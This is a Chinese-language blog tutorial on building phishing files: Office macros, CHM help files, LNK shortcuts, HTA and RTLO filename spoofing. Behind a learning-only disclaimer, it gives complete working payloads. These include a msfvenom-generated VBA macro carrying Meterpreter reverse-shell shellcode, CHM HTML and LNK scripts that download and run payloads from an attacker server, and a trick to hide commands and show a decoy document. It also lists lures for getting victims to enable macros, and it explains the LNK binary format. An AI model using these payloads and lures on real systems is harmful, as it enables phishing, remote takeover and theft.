声明

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

前言

漏洞利用那一节放到下篇吧,复现环境有点难找

测试环境

  • kail-2019.4
  • windows7 sp1 x64
  • windows10 x64

Office宏

首先来区别下Word和Excel各种后缀中的区别

Word文档

97-2003的旧版本文件名后缀就是**.doc**

从2007版以后后缀名是**.docx**

docx厉害一点。它是被压缩过的文档,体积更小,能处理更加复杂的内容,访问速度更快。

如果把docx的改为zip的话可以解压出里面的所有数据,不过空文档大部分都是XM格式的文件

Excel表格

xls是一个特有的二进制格式,其核心结构是复合文档类型的结构,而xlsx的核心结构是XML类型的结构,采用的是基于XML的压缩方式,使其占用的空间更小。xlsx中最后一个x的意义就在于此。

xls是2003版本下的文件 ,不管有没有宏程序的话都是xls文件 ,从2007开始做了区分,xlsm文件和xlsx文件都是excel 2007及其以后的文件,但前者是含有宏启用,Excel中默认情况下不自动启用宏,默认是xlsx。VBA中,如果不想保存代码,可以保存为xlsx,即可自动删除其中VBA代码,反之则保存为xlsm文件。

如何诱导

宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。由于早些年宏病毒泛滥,现在Office的宏功能已经默认是禁用,但依然无法阻挡攻击者使用宏。那么如何引诱受害者开启宏功能就是关键了,常用的套路

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。

制作简单的宏文件

这边以Word文档来举例吧,会的大佬直接跳过,感觉整片会被跳过了(逃

先创建个文档docdocx都行个人感觉没啥区别,如果是doc的话兼容性会更好

image-20200726202103886

记得要开宏,默认是关的就很难受

image-20200726202204961

然后在视图位置点击添加宏

image-20200726202317197

然后添加后是这么一个玩意

image-20200726202406765

接下来就是一些语法了,和常规编程差不多,各位应该看一眼就会了,然后该死的macOS11让我用不了虚拟机,这边全程使用windows来测试

首先我们来用msf生成个宏

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.183.138 LPORT=7890 -f vba -o ascotbe.vba

这是我们生成的宏

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Nyeo As Long, ByVal Pjfdx As Long, ByVal Acbomfr As LongPtr, Gpzfu As Long, ByVal Groc As Long, Qrepb As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Rpwgaj As Long, ByVal Ddbv As Long, ByVal Jduvicamq As Long, ByVal Glwnku As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Raftpjwrc As LongPtr, ByRef Wjiefyrxe As Any, ByVal Nvyyuvidk As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Nyeo As Long, ByVal Pjfdx As Long, ByVal Acbomfr As Long, Gpzfu As Long, ByVal Groc As Long, Qrepb As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Rpwgaj As Long, ByVal Ddbv As Long, ByVal Jduvicamq As Long, ByVal Glwnku As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Raftpjwrc As Long, ByRef Wjiefyrxe As Any, ByVal Nvyyuvidk As Long) As Long
#EndIf

Sub Auto_Open()
Dim Imtzv As Long, Laclv As Variant, Whxffnbhl As Long
#If Vba7 Then
Dim Esc As LongPtr, Hyub As LongPtr
#Else
Dim Esc As Long, Hyub As Long
#EndIf
Laclv = Array(72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101,72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,72,15,183,74,74,77,49,201,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1,193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24, _
11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72,1,208,80,139,72,24,68,139,64,32,73,1,208,227,86,72,255,201,65,139,52,136,72,1,214,77,49,201,72,49,192,172,65,193,201,13,65,1,193,56,224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1, _
208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,72,1,208,65,88,65,88,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255,224,88,65,89,90,72,139,18,233,75,255,255,255,93,73,190,119,115,50,95,51,50,0,0,65,86,73,137,230,72,129,236,160,1,0,0,73,137,229,73, _
188,2,0,30,210,192,168,183,138,65,84,73,137,228,76,137,241,65,186,76,119,38,7,255,213,76,137,234,104,1,1,0,0,89,65,186,41,128,107,0,255,213,106,10,65,94,80,80,77,49,201,77,49,192,72,255,192,72,137,194,72,255,192,72,137,193,65,186,234,15,223,224,255,213,72,137,199,106,16,65, _
88,76,137,226,72,137,249,65,186,153,165,116,97,255,213,133,192,116,10,73,255,206,117,229,232,147,0,0,0,72,131,236,16,72,137,226,77,49,201,106,4,65,88,72,137,249,65,186,2,217,200,95,255,213,131,248,0,126,85,72,131,196,32,94,137,246,106,64,65,89,104,0,16,0,0,65,88,72,137,242, _
72,49,201,65,186,88,164,83,229,255,213,72,137,195,73,137,199,77,49,201,73,137,240,72,137,218,72,137,249,65,186,2,217,200,95,255,213,131,248,0,125,40,88,65,87,89,104,0,64,0,0,65,88,106,0,90,65,186,11,47,15,48,255,213,87,89,65,186,117,110,77,97,255,213,73,255,206,233,60,255, _
255,255,72,1,195,72,41,198,72,133,246,117,180,65,255,231,88,106,0,89,73,199,194,240,181,162,86,255,213)

Esc = VirtualAlloc(0, UBound(Laclv), &H1000, &H40)
For Whxffnbhl = LBound(Laclv) To UBound(Laclv)
Imtzv = Laclv(Whxffnbhl)
Hyub = RtlMoveMemory(Esc + Whxffnbhl, Imtzv, 1)
Next Whxffnbhl
Hyub = CreateThread(0, 0, Esc, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub

image-20200726210839105

保存下就可以

然后我们在kali上监听

image-20200726211842860

带有宏的Word保存是这样的

image-20200726211912494

我们运行下试试

image-20200726221726990

上线成功

超链接

在PDF、Office文档中内嵌一个跳转链接是很早期的钓鱼方式,通过文字信息的引导,让受害者点开页面,如果缺乏戒心,就可能会获取到受害者的账号、密码、银行卡、身份证等信息。

img

CHM文档

CHM是Windows帮助文件(如电子书)使用的扩展名,此文件可以被植入可执行代码。

缺点:其缺点就是打开时会出现弹黑框、卡顿,容易被察觉。

收工制作钓鱼邮件

制作一个CHM文档,使用EasyCHM来制作

创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件,在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
hello word
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

上面说的根文件夹的index.html是运行就会执行文件,而另外test1和test2是需要点击才会执行的,所有这两个文件夹我们不填写任何东西

直接上GIF图来演示

2

利用CS/msf制作钓鱼CHM文件

CS制作方式

点击attacks——>web Drive by——>scripted web Delivery

image-20200811174211768

生成好的命令

image-20200811174319596

MSF制作方式

执行如下命令即可

1
2
3
4
5
6
7
use exploit/multi/script/web_delivery 
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.10.128 #本机地址
set srvhost 0.0.0.0
set srvport 8080

1

然后我们把MSF命令插入到CHM文件里面,注意执行的进程那边要用,号隔开

1
2
3
4
5
6
7
8
9
10
11
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c $Y=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$Y.proxy=[Net.WebRequest]::GetSystemWebProxy();$Y.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ([System.Text.Encoding]::ASCII.GetString($Y.downloaddata('http://192.168.1.8:8080/EN7JqNv')));">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

这边以MSF作为演示

2

LNK钓鱼

制作快捷方式来钓鱼,需要创建两个文件

1

我们将任意一个快捷方式的“属性”中“目标”的值修改为如下字符串:

1
%SystemRoot%\system32\cmd.exe cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://127.0.0.1/1.exe','.\\1.exe');&cmd /c .\\1.exe

当我们再次运行这个快捷方式时,就达到了利用powershell从远程服务器下载文件到本地并执行的功能。这仅仅是其中一种用法,还有各种不同的方法都可以演化出来。就看你脑洞有多大。

快速生成lnk样本

  • 创建test.ps1文件

    1
    2
    3
    4
    5
    6
    $WshShell = New-Object -comObject WScript.Shell
    $Shortcut = $WshShell.CreateShortcut("test.lnk")
    $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
    $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
    $Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe"
    $Shortcut.Save()
  • 然后运行

    1
    powershell -ExecutionPolicy RemoteSigned -file test.ps1

image-20200812214347733

我们生成的恶意文件,接下来只要把这个文件发送给目标即可(你服务器一定要有ascotbe.exe这个文件)

在我们的服务器上生成个文件然后开个http服务

image-20200812215457292

然后目标机器运行我们的快捷方式

image-20200812215620974

接着我们只要把生成好的这个test快捷方式发送给目标,双击后就会收到系统上线了

LNK文件格式解析

我们从二进制的格式来解读下LNK文件,完整文档可以看微软的文档

1
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/747629b3-b5be-452a-8101-b9a2ec49978c

分析lnk文件

1
https://github.com/Ascotbe/Random-img/blob/master/Offer/%E7%81%AB%E7%BB%92%E5%AE%89%E5%85%A8%E8%BD%AF%E4%BB%B6.lnk

头文件

前面有20个字节固定不变

image-20200813164015856

  • HeaderSize(4 bytes, offset 0x00):0x0000004C
  • LinkCLSID(16 bytes, offset 0x04):00021401-0000-0000-C000-000000000046

LinkFlags

offset 0x14起始4字节为LinkFlags

0 1 2 3 4 5 6 7 8 9 1 0 1 2 3 4 5 6 7 8 9 2 0 1 2 3 4 5 6 7 8 9 3 0 1
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z A A 0 0 0 0 0

解释如下

Value Description
A HasLinkTargetIDList The shell link is saved with an item ID list (IDList). If this bit is set, a LinkTargetIDList structure (section 2.2) MUST follow the ShellLinkHeader. If this bit is not set, this structure MUST NOT be present.
B HasLinkInfo The shell link is saved with link information. If this bit is set, a LinkInfo structure (section 2.3) MUST be present. If this bit is not set, this structure MUST NOT be present.
C HasName The shell link is saved with a name string. If this bit is set, a NAME_STRING StringData structure (section 2.4) MUST be present. If this bit is not set, this structure MUST NOT be present.
D HasRelativePath The shell link is saved with a relative path string. If this bit is set, a RELATIVE_PATH StringData structure (section 2.4) MUST be present. If this bit is not set, this structure MUST NOT be present.
E HasWorkingDir The shell link is saved with a working directory string. If this bit is set, a WORKING_DIR StringData structure (section 2.4) MUST be present. If this bit is not set, this structure MUST NOT be present.
F HasArguments The shell link is saved with command line arguments. If this bit is set, a COMMAND_LINE_ARGUMENTS StringData structure (section 2.4) MUST be present. If this bit is not set, this structure MUST NOT be present.
G HasIconLocation The shell link is saved with an icon location string. If this bit is set, an ICON_LOCATION StringData structure (section 2.4) MUST be present. If this bit is not set, this structure MUST NOT be present.
H IsUnicode The shell link contains Unicode encoded strings. This bit SHOULD be set. If this bit is set, the StringData section contains Unicode-encoded strings; otherwise, it contains strings that are encoded using the system default code page.
I ForceNoLinkInfo The LinkInfo structure (section 2.3) is ignored.
J HasExpString The shell link is saved with an EnvironmentVariableDataBlock (section 2.5.4).
K RunInSeparateProcess The target is run in a separate virtual machine when launching a link target that is a 16-bit application.
L Unused1 A bit that is undefined and MUST be ignored.
M HasDarwinID The shell link is saved with a DarwinDataBlock (section 2.5.3).
N RunAsUser The application is run as a different user when the target of the shell link is activated.
OHasExpIcon The shell link is saved with an IconEnvironmentDataBlock (section 2.5.5).
P NoPidlAlias The file system location is represented in the shell namespace when the path to an item is parsed into an IDList.
Q Unused2 A bit that is undefined and MUST be ignored.
R RunWithShimLayer The shell link is saved with a ShimDataBlock (section 2.5.8).
S ForceNoLinkTrack The TrackerDataBlock (section 2.5.10) is ignored.
T EnableTargetMetadata The shell link attempts to collect target properties and store them in the PropertyStoreDataBlock (section 2.5.7) when the link target is set.
U DisableLinkPathTracking The EnvironmentVariableDataBlock is ignored.
V DisableKnownFolderTracking The SpecialFolderDataBlock (section 2.5.9) and the KnownFolderDataBlock (section 2.5.6) are ignored when loading the shell link. If this bit is set, these extra data blocks SHOULD NOT be saved when saving the shell link.
W DisableKnownFolderAlias If the link has a KnownFolderDataBlock (section 2.5.6), the unaliased form of the known folder IDList SHOULD be used when translating the target IDList at the time that the link is loaded.
X AllowLinkToLink Creating a link that references another link is enabled. Otherwise, specifying a link as the target IDList SHOULD NOT be allowed.
Y UnaliasOnSave When saving a link for which the target IDList is under a known folder, either the unaliased form of that known folder or the target IDList SHOULD be used.
Z PreferEnvironmentPath The target IDList SHOULD NOT be stored; instead, the path specified in the EnvironmentVariableDataBlock (section 2.5.4) SHOULD be used to refer to the target.
AA KeepLocalIDListForUNCTarget When the target is a UNC name that refers to a location on a local machine, the local path IDList in the PropertyStoreDataBlock (section 2.5.7) SHOULD be stored, so it can be used when the link is loaded on the local machine.

可以在010 Editor中看到,1表示设置的,0表示未设置的

image-20200813170527371

FileAttributes

offset 0x18起始4字节为FileAttributes 0x00000020表示FILE_ATTRIBUTE_ARCHIVE

CreateTime & AccessTime & WriteTime

offset 0x1C开始,每个字段各占8字节:

image-20200813170742853

FileSize

offset 0x34起始FileSize0x000C0B10(占4个字节)

image-20200813171033900

IconIndex

IconIndex0x00000000(占4个字节)。

ShowCommand & Hotkey

offset 0x3C开始,ShowCommand4字节,0x00000001表示SW_SHOWNORMAL,当然也可以根据具体的需要替换为SW_SHOWMAXIMIZED (0x00000003)(窗口最大化)以及SW_SHOWMINNOACTIVE (0x00000007)(窗口最小化)

Hotkey2字节;余下10个字节均为保留位。

LinkTargetIDList

offset 0x4C开始,两个字节表示大小,这个位置就是一个一个文件夹拼接起来的一个完整路径,这边测试的完整路径**”C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsMain.exe”**

image-20200813172205813

第一个ItemID为CLSID_MyComputer

第二个ItemID,其含义为c:

image-20200813172621938

第三个ItemID,第二层级路径

image-20200813172831624

第四个ItemID-第6个ItemID

image-20200813173247917

LinkInfo

image-20200813173515708

String Data

StringData WORKING_DIR这个字段是起始位置的值

StringData ICON_LOCATION这个字段是图标位置的值

image-20200813173754425

EXTRA_DATA

EXTRA_DATA

这边记个小TOP

  • 目标文件位置所能显示最大字符串为260个,所有我们可以把执行的命令放在260个字符后面,具体生成PS脚本如下

    1
    2
    3
    4
    5
    6
    7
    $file = Get-Content ".\test.txt"
    $WshShell = New-Object -comObject WScript.Shell
    $Shortcut = $WshShell.CreateShortcut("test.lnk")
    $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
    $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
    $Shortcut.Arguments = ' '+ $file
    $Shortcut.Save()

    image-20200814175119204

  • 我们可以在执行完shell后再从服务器上下载个伪装文件,并且打开他,用来迷惑目标(比如你做的钓鱼文件是PDF的那你就下载个PDF正常的打开他),这边测试下载两个文件,一个是CMD一个powershell(下面的代码是上面所说的test.txt中的代码)

    1
    /c powershell -nop -w hidden -c "IEX ((new-object net.webclient).DownloadFile('http://192.168.0.126:8000/cmd.exe','1.exe'))";&powershell -nop -w hidden -c "IEX ((new-object net.webclient).DownloadFile('http://192.168.0.126:8000/powershell.exe','2.exe'))" ;&powershell start-process '.\1.exe';&powershell start-process '.\2.exe'

    最终效果如下

    2

HTA钓鱼

HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,它具有桌面程序的所有权限。
就是一个html应用程序,双击就能运行。

Cobalt Strike生成方式:attacks——>packages——>HTML application

image-20200812182253747

点击生成后把.hta文件发送给目标,目标运行后就可以看到机器上线了

image-20200812182638955

文件后缀RTLO

伪装文件中有个比较古老的方式,但依然会在攻击中看到它的身影。RTLO字符全名为“RIGHT-TO-LEFT OVERRIDE”,是一个不可显示的控制类字符,其本质是unicode 字符。可以将任意语言的文字内容按倒序排列,最初是用来支持一些从右往左写的语言的文字,比如阿拉伯语,希伯来语。由于它可以重新排列字符的特性,会被攻击者利用从而达到欺骗目标,使得用户运行某些具有危害性的可执行文件。

原理

制作方式就是这样的,他会让字符串倒着编码

image-20200813105304237

简单的生成

用Python一键生成用,把txt改为png后缀

1
2
import os
os.rename('ascotbe.txt', 'ascotbe-\u202egnp.txt')

image-20200813110156755

可以看到我们吧ascotbe.txt改成了ascotbe-txt.png并且还是个文本文档类型

生成钓鱼文件

如果是exe文件的话可以替换图标,来进行迷惑行为,我们先生成一个魅惑名字的文件

image-20200813111611299

运行python脚本

image-20200813111646139

然后我们用Resource Hacker替换图标

image-20200813114403776

参考文章

1
2
3
4
5
https://github.com/bhdresh/CVE-2017-0199
https://www.jianshu.com/p/850d1363abc5
https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247485861&idx=1&sn=a4b87208c753c317240c7ae063871cdb&chksm=9b392f14ac4ea60240ca3c84f39f65a3b5584a08dbcf07b6962c3464ae282c3a1003fa3de37a&scene=126&sessionid=1596119031&key=25e1725a9070fca2a709c8a9cb837164ccd0b43058ae37339d865f113689c2ed541a337af3977dc16e95d85b32d7227c74f6df7e543f6d7634aced40e7cca665ce2895f15fe993763124fd2fa7c10091&ascene=1&uin=MTAzNzIzNDc2MQ%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_CN&exportkey=Aeo1t2sb2ZHnz3Nz8kzqLmw%3D&pass_ticket=DQWeM2sy7zmodhMi%2BT8fLsw34y3Tz9aBp44VMrGf14Nmcl7qS6hcq5YMCuQUdGSU
http://zijieke.com/d/172
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c3376b21-0931-45e4-b2fc-a48ac0e60d15